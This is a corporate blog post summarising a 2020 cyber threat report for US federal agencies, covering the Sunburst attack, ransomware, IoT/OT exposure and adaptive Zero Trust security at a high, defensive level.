Recent Accenture research found that targeted cyberattacks against federal agencies have grown in both number and sophistication throughout 2019-20, and counting speculative attacks increases that total even further. The study also found that agencies have made progress in both securing their enterprise and responding more effectively to intrusions.
But the size and scope of the recent Sunburst supply chain cyberattack demonstrates that our adversaries remain agile, adaptive, and determined in their efforts to exploit vulnerabilities in agency networks and the broader IT ecosystem.
Emerging analysis indicates that this was an especially sophisticated attack, the type of which are fortunately rare. But even the commodity attacks that agencies face daily are growing in sophistication, according to Accenture’s 2020 Cyber Threatscape Report. Based on the work of Accenture’s cyber threat intelligence (CTI) gathering and analysis operation, which features analysts working globally across 25 different languages, the report contains important insights for federal agencies.
Our analysis identifies emergent trends and new patterns in adversary tactics, techniques, and procedures (TTP) — the way attackers are starting to behave today and will continue to behave tomorrow. Sunburst underlines the need to continually consider new attack vectors and adapt our defenses accordingly. While published prior to the discovery of this latest attack, the report offers valuable insights into other continuing threats and risks facing network defenders.
These five trends identified have specific implications for federal agencies:
Increasingly sophisticated attacks on business continuity platforms.
Internet-accessible resources like mail servers have always been tough to defend and — because of the volume of different kinds of traffic they handle — easy for attackers to hide in. During the pandemic, they’ve become vital lifelines for federal agencies, as they have for many other enterprises. Now they’re the target of increasingly sophisticated attacks from nation-state level hackers.
These attacks target vulnerabilities exposed by employees working remotely due to COVID-19, like those in VPN platforms or in collaboration and communications tools. A successful intrusion into these platforms can provide a beachhead from which attackers can relay commands, compromise e-mail, exfiltrate data, and harvest credentials.
Sophisticated actors hiding amid the white noise of low-level attacks.
These highly sophisticated and aggressive nation-state level groups use commercial tools (“living off the land”) and stealth tactics like log deletion or forging authentication tokens — similar to those reportedly employed by the Sunburst attackers — to thwart or complicate detection and attribution. The volume of noisy amateur attacks currently targeting federal networks makes it easier for such actors to survey and even attack without being detected — they can hide in the fog of war.
These stealth tactics highlight the need for detection based on heuristics rather than signatures. Traditional antivirus security technology based on easily changed code signatures is blind to this kind of activity. Instead, defenders need technologies that give them visibility into, for instance, tool usage within the IT environment — enabling them to establish a baseline of what's normal and a picture of a known good state. Only in this way can defenders have a chance of spotting anomalies like benign tools being used in a malicious way.
A more mature security capability will automate repetitive low-level work and free human analysts up for exactly this kind of intelligence-driven threat hunting.
<<< Start >>>
A more mature security capability will automate repetitive low-level work and free human analysts up for intelligence-driven threat hunting.
<<< End >>>
A new focus on ransomware.
The enormous profitability of ransomware has created a new generation of threat actors, with the funding to invest in novel, adaptive malware.
Five years ago, federal cyber defenders might have rightly dismissed ransomware groups as low-level malicious activity — and not something that a mature security operation would have to worry about. Now they have to be taken more seriously given the number of successful attacks across the broader public sector, within healthcare, and amongst critical infrastructure providers.
An agency’s extended network is especially vulnerable. Accenture’s Third Annual State of Cyber Resilience Report – Federal Edition found that 85% of federal respondents say that their organizations need to think beyond securing their enterprises and take steps to secure their ecosystems to be effective.
Connectedness has consequences.
Progress has been made in mitigating some categories of IoT vulnerabilities, but those gains are more than offset by all the new operational technology (OT) devices coming online. We have doubled the size of the attack surface by IP-enabling OT networks — and these networks are often managed by the facilities department rather than the IT department. The CISO may have zero visibility. And by the way, these are the systems that control the things that are really important to us, like power generation, water supply, and CCTV networks.
<<< Start >>>
<<< End >>>
Threats against IoT and OT networks will continue to grow as organizations rely more and more on connected technologies. The lack of visibility into OT networks makes defending them more difficult and will require new solutions in both the corporate and government environments to detect and deter these threats.
Breaking down the cultural and bureaucratic barriers between OT and IT management is vital for security in the internet-of-everything world.
The need for adaptive security.
But the biggest takeaway is this: The new normal requires adaptive security and heralds the end of perimeter protection — defenders can’t rely on their firewalls and network security stacks anymore. Increased teleworking and the accelerated move to the cloud means the perimeter is everywhere.
Adaptive security is a cybersecurity mindset that emphasizes continuous monitoring to prepare for and adapt to new threats. Adaptive security is our Zero Trust model and reflects the reality for our federal customers — that it’s a journey not a destination. When the perimeter is everywhere and data has to be protected, a mature security capability is essential, as is strong identity proofing and multi-factor, continuous authentication.
But even to embark on the adaptive security journey, agencies must have the fundamentals in place. We can’t just flick a switch. We need a modern identity and access management infrastructure, for instance. We need to invest in those basic building blocks.
Managed security services enable security teams to outsource and automate repetitive tasks and concentrate on proactive, intelligence-driven threat hunting, pulling together curated CTI and using it to anticipate and emulate expected campaigns by nation-state level adversaries.
<<< Start >>>
<<< End >>>
The pandemic changed everything — some security teams lost the visibility they needed, and the stacks no longer protect us the way they used to. Home networks are on the front line. And Sunburst changed everything again: More than ever, we need an end to siloed security operations centers — with each agency defending its own network against the same adversaries, duplicating the same repetitive tasks, and wasting away the precious currency of our defenders’ time and attention. We need visibility across the entire .gov domain and partnership with our private sector suppliers — managed services can help provide that.
Special thanks to Accenture Federal Services’ Max Margolis (Threat Hunt Lead) for contributing his expertise to this blog.